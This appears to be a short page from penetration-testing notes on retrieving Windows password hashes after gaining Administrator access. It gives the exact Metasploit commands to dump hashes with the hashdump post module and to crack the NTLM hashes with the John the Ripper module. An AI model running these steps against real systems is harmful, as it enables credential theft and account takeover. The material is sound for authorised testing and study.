Skip to main content

retrieving_passwords

Once we are Administrator, it may be important to retrieve the passwords, in order to do this, can either use hashdump from meterpreter (but this won't always work) or from msfconsole do this:

use post/windows/gather/hashdump
options
set session 1
run

At this point we can use john the ripper, to crack these password hashes, notice that we have john the ripper available also from metasploit (jtr). These are NTLM hashes and we can try to crack them fast with metasploit by doing:

use auxiliary/analyze/jtr_crack_fast
set session 1
options
run